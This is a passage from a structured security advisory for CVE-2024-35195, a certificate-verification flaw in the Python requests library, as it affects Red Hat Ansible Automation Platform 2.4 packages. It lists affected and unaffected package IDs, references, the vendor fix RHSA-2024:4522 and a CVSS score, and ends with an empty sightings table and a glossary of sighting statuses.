"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-35195"
},
{
"category": "external",
"summary": "RHBZ#2282114",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2282114"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-35195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"
},
{
"category": "external",
"summary": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56",
"url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"
}
],
"release_date": "2024-05-20T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "requests: subsequent requests to the same host ignore cert verification"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.